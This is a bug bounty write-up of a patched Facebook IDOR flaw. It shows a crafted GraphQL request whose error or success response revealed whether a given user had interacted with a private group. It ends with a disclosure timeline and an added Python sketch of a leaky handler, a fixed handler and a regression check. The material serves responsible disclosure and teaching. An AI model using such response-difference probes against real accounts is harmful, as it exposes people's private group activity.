Marcos Ferreira

Published On: 27 Dec 2022

$3,000

Private Group Interaction Disclosure

IDOR
Facebook | Web
---
LOW VALID
Description

I've discovered a bug that allows a non-member to determine if a specific user has interacted with a private group.

Impact

This interaction could indicate that the user has visited the private group, is currently a member of it, or was previously a member.




Reproduction Steps

Step 1

Send a POST request to graph.facebook.com/graphql with modified parameters for the group_id and user_id to check for group interaction.

variables= {"params":{"nt_context":{"using_white_navbar":true,"pixel_ratio":3,"styles_id":"0","bloks_version":"0"},"path":"groups/group_questions/","params":"{\"group_id\":0000,\"user_ID\":0000}","extra_client_data":{}},"scale":"3","nt_context":{"using_white_navbar":true,"pixel_ratio":3}}

doc_id=5055248221176502

Step 2

If the user has not interacted with the group, the response contains an error message.

{"data":{"native_template_screen":null},"errors":[{"message":"A server error field_exception occured. Check server logs for details."

Step 3

However, if the user has previously interacted with the group, there will be no errors.
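
An added example, not part of the original report and not Facebook's code or its actual fix: a minimal Python model of the response difference described in steps 2 and 3, next to a handler that authorizes the viewer before touching the target user's data and returns one fixed response on every denial. All names, IDs and data are hypothetical and constructed.

```python
# Constructed in-memory data; every name and ID here is hypothetical.
GROUP_MEMBERS = {1001: {"alice"}}               # private group -> current members
GROUP_INTERACTIONS = {1001: {"alice", "bob"}}   # users with any recorded interaction

# One fixed body for every denial, so the response cannot act as an oracle.
NOT_AVAILABLE = {"data": None, "errors": [{"message": "not available"}]}


def questions_screen_leaky(viewer, group_id, user_id):
    """Before: no viewer check, so error vs. no error depends only on the target user."""
    if user_id not in GROUP_INTERACTIONS.get(group_id, set()):
        return {"data": None, "errors": [{"message": "field_exception"}]}
    return {"data": {"screen": "group_questions"}, "errors": []}


def questions_screen_fixed(viewer, group_id, user_id):
    """After: authorize the viewer first; all failure paths share one response."""
    if viewer not in GROUP_MEMBERS.get(group_id, set()):
        return NOT_AVAILABLE          # same body for unknown group or non-member
    if user_id not in GROUP_INTERACTIONS.get(group_id, set()):
        return NOT_AVAILABLE
    return {"data": {"screen": "group_questions"}, "errors": []}


def leaks_interaction(handler, viewer, group_id, known_user, unknown_user):
    """Regression check: True if the viewer can tell the two target users apart."""
    return handler(viewer, group_id, known_user) != handler(viewer, group_id, unknown_user)


if __name__ == "__main__":
    for handler in (questions_screen_leaky, questions_screen_fixed):
        leak = leaks_interaction(handler, "mallory", 1001, "bob", "carol")
        print(f"{handler.__name__}: non-member can distinguish targets = {leak}")
```

The `leaks_interaction` check is the part worth keeping as a regression test: it compares whole responses for a non-member viewer, so any difference in body or error text between the two targets fails it.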

Timeline
Marcos 14 Jan 2022

Initial Report

Facebook 17 Jan 2022

Triaged: Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation.

Facebook 22 Jan 2022

Bug Fixed: We have looked into this issue and believe that the vulnerability has been patched.

Facebook 23 Jan 2022

Bounty awarded: It was possible to check if a specific user (based on User ID) interacted with a specific group (based on group ID).

VALID